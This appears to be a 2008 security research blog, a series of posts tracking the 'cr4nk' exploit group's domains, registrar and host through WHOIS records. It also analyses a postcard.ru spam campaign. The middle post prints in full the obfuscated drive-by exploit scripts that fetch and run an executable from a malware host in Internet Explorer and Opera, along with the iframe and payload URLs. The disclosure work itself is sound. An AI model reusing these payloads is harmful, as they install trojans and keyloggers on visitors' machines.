Directi and HostFresh still supporting criminals!

It would seem Directi wasn't really being serious when they said they were clamping down on just what their customers were doing, because our friend cr4nk now has a new domain (as of September 23rd) - cr4nk.us.

WhoIs Information:

Domain Name: CR4NK.US
Domain ID: D17780827-US
Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Registrar URL (registration services): www.publicdomainregistry.com
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Registrant ID: DI_2419181
Registrant Name: ITWEB Domain Protection
Registrant Organization: ITWEB Domain Protection
Registrant Address1: Edif. Neptuno, Local #7
Registrant Address2: Via Ricardo J Alfaro, Tumba Muerto
Registrant City: Panama Ciudad
Registrant State/Province: Panama
Registrant Postal Code: -
Registrant Country: Panama
Registrant Country Code: PA
Registrant Phone Number: +005.72021515
Registrant Email: itweb@hushmail.com
Registrant Application Purpose: P1
Registrant Nexus Category: C11
Administrative Contact ID: DI_2419181
Administrative Contact Name: ITWEB Domain Protection
Administrative Contact Organization: ITWEB Domain Protection
Administrative Contact Address1: Edif. Neptuno, Local #7
Administrative Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Administrative Contact City: Panama Ciudad
Administrative Contact State/Province: Panama
Administrative Contact Postal Code: -
Administrative Contact Country: Panama
Administrative Contact Country Code: PA
Administrative Contact Phone Number: +005.72021515
Administrative Contact Email: itweb@hushmail.com
Administrative Application Purpose: P1
Administrative Nexus Category: C11
Billing Contact ID: DI_2419181
Billing Contact Name: ITWEB Domain Protection
Billing Contact Organization: ITWEB Domain Protection
Billing Contact Address1: Edif. Neptuno, Local #7
Billing Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Billing Contact City: Panama Ciudad
Billing Contact State/Province: Panama
Billing Contact Postal Code: -
Billing Contact Country: Panama
Billing Contact Country Code: PA
Billing Contact Phone Number: +005.72021515
Billing Contact Email: itweb@hushmail.com
Billing Application Purpose: P1
Billing Nexus Category: C11
Technical Contact ID: DI_2419181
Technical Contact Name: ITWEB Domain Protection
Technical Contact Organization: ITWEB Domain Protection
Technical Contact Address1: Edif. Neptuno, Local #7
Technical Contact Address2: Via Ricardo J Alfaro, Tumba Muerto
Technical Contact City: Panama Ciudad
Technical Contact State/Province: Panama
Technical Contact Postal Code: -
Technical Contact Country: Panama
Technical Contact Country Code: PA
Technical Contact Phone Number: +005.72021515
Technical Contact Email: itweb@hushmail.com
Technical Application Purpose: P1
Technical Nexus Category: C11
Name Server: NS1.IPNAMES.NET
Name Server: NS2.IPNAMES.NET
Created by Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Last Updated by Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. DBA PUBLICDOMAINREGISTRY.COM
Domain Registration Date: Tue Sep 23 01:37:49 GMT 2008
Domain Expiration Date: Tue Sep 22 23:59:59 GMT 2009
Domain Last Updated Date: Tue Sep 23 01:54:02 GMT 2008

>>>> Whois database was last updated on: Fri Oct 03 20:57:20 GMT 2008 <<<<

Even worse here, is Directi using ITWeb Domain Protection - a "company" known ONLY for it's association with scammy/malicious domains. I've not come across a single legit domain that's associated with them, and as noted above, they don't seem to have their own website, opting instead, to provide a hushmail.com contact address. Further to this, ITWeb Domain Protection list their location as Panama (more here), a country that's become a favourite amongst organized criminals online (e.g. Est Domains and the RBN), but interestingly, earlier this year, according to an arbitration, they listed themselves as being in India.

See Google for a ton of people complaining about ITWeb Domain Protection;

http://www.google.co.uk/search?hl=en&q=%22ITWEB+Domain+Protection%22&start=10&sa=N

And who is providing the hosting for this domain? HostFresh of course - same as last time.

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC

I have sent Directi an e-mail asking why they've allowed cr4nk to register a new domain with them, given their known history (and still ongoing) of trying to exploit web servers via RFI (Remote File Injection) and DCI (Direct Code Injection), and will let you know if/when I receive a response (I'm not hopeful).

Other domains on this IP block include;

1. bestfullwarez.com [ Class: EMD / IP: 116.50.15.114 ]
2. browsehentai.com [ Class: EMD / IP: 116.50.15.114 ]
3. cr4nk.us [ Class: EMD / IP: 116.50.15.114 ]
4. ddlicious.com [ Class: WRZ / IP: 116.50.9.32 ]
5. europe-warez.eu [ Class: EMD / IP: 116.50.15.114 ]
6. genx-anime.net [ Class: EMD / IP: 116.50.15.114 ]
7. greathostlist.com [ Class: EMD / IP: 116.50.15.114 ]
8. iload.to [ Class: EMD / IP: 116.50.15.114 ]
9. linkbase.biz [ Class: EMD / IP: 116.50.15.114 ]
10. lovemiss.com [ Class: EMD / IP: 116.50.15.114 ]
11. mail.getmoney4offer.net [ Class: EMD / IP: 116.50.15.114 ]
12. mail.ztorne.com [ Class: EMD / IP: 116.50.15.114 ]
13. mdz2k.com [ Class: EMD / IP: 116.50.15.114 ]
14. music-load.me [ Class: EMD / IP: 116.50.15.114 ]
15. natwestbgroups.com [ Class: EMD / IP: 116.50.15.114 ]
16. ns1.nosmtp.net [ Class: EMD / IP: 116.50.15.114 ]
17. ns2.nosmtp.net [ Class: EMD / IP: 116.50.15.114 ]
18. ns23.wrzhost.com [ Class: EMD / IP: 116.50.15.114 ]
19. ns24.wrzhost.com [ Class: EMD / IP: 116.50.15.114 ]
20. porn2go.org [ Class: EMD / IP: 116.50.15.114 ]
21. swinget.com [ Class: EMD / IP: 116.50.15.114 ]
22. us-ddl.com [ Class: EMD / IP: 116.50.15.114 ]
23. www.bestfullwarez.com [ Class: EMD / IP: 116.50.15.114 ]
24. www.browsehentai.com [ Class: EMD / IP: 116.50.15.114 ]
25. www.cr4nk.us [ Class: EMD / IP: 116.50.15.114 ]
26. www.ddlicious.com [ Class: WRZ / IP: 116.50.9.32 ]
27. www.europe-warez.eu [ Class: EMD / IP: 116.50.15.114 ]
28. www.genx-anime.net [ Class: EMD / IP: 116.50.15.114 ]
29. www.greathostlist.com [ Class: EMD / IP: 116.50.15.114 ]
30. www.iload.to [ Class: EMD / IP: 116.50.15.114 ]
31. www.linkbase.biz [ Class: EMD / IP: 116.50.15.114 ]
32. www.lovemiss.com [ Class: EMD / IP: 116.50.15.114 ]
33. www.mdz2k.com [ Class: EMD / IP: 116.50.15.114 ]
34. www.music-load.me [ Class: EMD / IP: 116.50.15.114 ]
35. www.natwestbgroups.com [ Class: EMD / IP: 116.50.15.114 ]
36. www.porn2go.org [ Class: EMD / IP: 116.50.15.114 ]
37. www.swinget.com [ Class: EMD / IP: 116.50.15.114 ]
38. www.us-ddl.com [ Class: EMD / IP: 116.50.15.114 ]
39. www.zdig1.com [ Class: EMD / IP: 116.50.15.114 ]
40. zdig1.com [ Class: EMD / IP: 116.50.15.114 ]

---

References:

hpHosts - cr4nk.us
http://hosts-file.net/?s=cr4nk.us

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html

cr4nk.ws has gone!
http://hphosts.blogspot.com/2008/09/cr4nkws-has-gone.html

cr4nk responds - OH NOEZ!
http://hphosts.blogspot.com/2008/09/cr4nk-responds-oh-noez.html

Skiddie responds ..... again - cr4nk says thanks?
http://hphosts.blogspot.com/2008/10/skiddie-responds-again-cr4nk-says.html

Postcard.ru malware ... and esthost.eu make an appearance

Is it just me, or does this seem familiar? Of course it does, postcard.ru malware has been going around for yonks!.

I received another e-mail today, and I must admit, it's been a while since I've received one of these, but never the less, the e-mail claimed to come from postcard.ru;

Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'

Служба рассылки открыток POSTCARD.RU
------------------------------------------------

You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'

Postcard service POSTCARD.RU

savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iFrame to twain32.cn;

<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100&q
uot;></iframe>

Ref:
http://vurl.mysteryfcm.co.uk/?url=132594

If you are using IE7 then twain32.cn returns the following;

 <script>
 function CreateO(os, nz)
 {
   var e0 = null;
   try
   {
     eval('e0 = os.CreateObject(nz)')
   }
   catch(e)
   {
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "", "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject("", nz)')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz)')
     }
     catch(e)
     {
     }
   }
   return(e0);
 }
 function Download(a)
 {
   var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
   lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
   lm.send();
   var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
   o.type = 1;
   o.Mode = 3;
   o.open();
   o.Write(lm.responseBody);
   var tut = ".//..//win"+".exe";
   o.savetoFile(tut,2);
   o.close();
   var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
   s.Shellexecute(tut);
 }
 var x = 0;
 var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
 while (t[x])
 {
   var a = null;
   if (t[x].substring(0,1) == '{')
     {
       a = document.createElement('object');
       a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
     }
     else
     {
       try
       {
         a = new ActiveXObject(t[x]);
       }
       catch(e)
       {
       }
     }
     if (a)
     {
       try
       {
         var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
         if (b)
         {
           if (Download(a)) break;
         }
       }
       catch(e)
       {
       }
     }
     x++;
   }
   setTimeout("window.location = 'jav.php'", 2500);
   </script>
   </body>
   </html>

If you are using Opera, you get the following;

<script language=javascript>  
blank_iframe = document.createElement('if'+'ra'+'me');  
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';  
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');  
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');  
document.appendChild(blank_iframe);  
blank_iframe_window.eval  
   ("config_iframe = document.createElement('if'+'ra'+'me');\  
   config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\  
   config_iframe.src = 'op'+'era:c'+'on'+'fig';\  
    document.appendChild(config_iframe);\  
    app_iframe = document.createElement('sc'+'ri'+'pt');\  
    cache_iframe = document.createElement('if'+'ra'+'me');\  
    app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\  
    app_iframe.onload = function ()\  
    {\  
        cache_iframe.src = 'op'+'er'+'a:c'+'ache';\  
        cache_iframe.onload = function ()\  
        {\  
            cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\  
            var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
            .src.toUpperCase(), '');\ 
            filename = cache.match(re);\  
            config_iframe_window.eval\  
            (\"\  
            opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\  
            app_link = document.createElement('a');\  
            app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\  
            app_link.click();\  
            setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\  
            \");\  
        };\  
        document.appendChild(cache_iframe);\  
    };\  
    document.appendChild(app_iframe);");  
</script>  
</body>  
</html>

Ref:
http://vurl.mysteryfcm.co.uk/?url=132605

twain32.cn resolves to the IP 195.5.116.239, which has a PTR that shows: src.esthost.eu (IP: 195.5.116.239). Alas Whois.eu don't seem to want to allow us to do a remote WhoIs, so we've got to eurid.eu. No problem. When doing a WhoIs lookup on esthost.eu, we see;

Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm

Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
    PAE 21
    11415 Tallinn
    EE
    Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu

Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
    14525 SW Millikan #48732
    97005-2343 Beaverton
    Oregon
    United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com

Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com

Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)

Net-block information:

inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered

organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered

person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered

% Information related to '195.5.116.0/23AS39823'

route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered

Getting back to the infection however. This comes courtesy of yvon-publicidad.com, as you can see in the above source code;

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;



This, according to ThreatExpert, downloads the following;

http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)

Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003

The report makes for very interesting reading as it shows an injection into the IE process (injects mswapi.dll), trojans and keyloggers - oh the fun!.

WhoIs for the domain shows;

Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France

Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08

A little searching turned up a couple of other possibly related (previous versions?) reports;

http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb

http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949

vURL Online Updated .......

Just a note folks, I've re-written part of vURL Online, so that you now have a nice clean link for using when you want to refer back to it. For example;

http://vurl.mysteryfcm.co.uk/?url=132590

Previously, this would have been an extremely long URL;

http://vurl.mysteryfcm.co.uk/?url=http://www.twain32.cn/img/out.php?s_id=1&selUAStr=0&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://savichev.com/card.php?fr=HarrisScott

Skiddie responds ..... again - cr4nk says thanks?

I thought our skiddie was finished following his last e-mail but alas, he wants me to know he's still there. This time, he thanked me for info (not sure what he's thanking me for but okay), and says that my taking his site offline was "no problem for us".

ah hy steven. well u busted our website but u have to think abit again. cuz on the space was no illegal stuff. we are using the bots on other servers we are not stupid. we take a new domain and its over. no problem for us but thanks for the info

Pity he didn't tell me what the new domain was ......

Skiddiealysis - Analyzing skiddie scanners

I came across this early this morning but was far too shattered to post about it ..... so several hours and some sleep later, here it is. This comes courtesy of Insecurity.nl;

Due to the international nature of the blogging entry, it will be in english, for some non-dutch speaking internet users might be interested in it's contents. Some time ago, SavageTiger blogged about the RFI bot attacks against our servers, and the internet in general. I decided to take a look, interested in the concept of automated RFI scanners and PHP-based bots. Although the groups behind it turned out to be rather dissapointing, and I encountered a lot of horribly written code, it was a rather interesting ride as well. Let us first look at the bot SavageTiger discovered:

http://www.insecurity.nl/?strInsecurity_Component=article&intArticle_ID=111

Interestingly, our favourite skiddie, cr4nk, hasn't replied since his second e-mail this morning. Ran out of words in his vocabulary perhaps?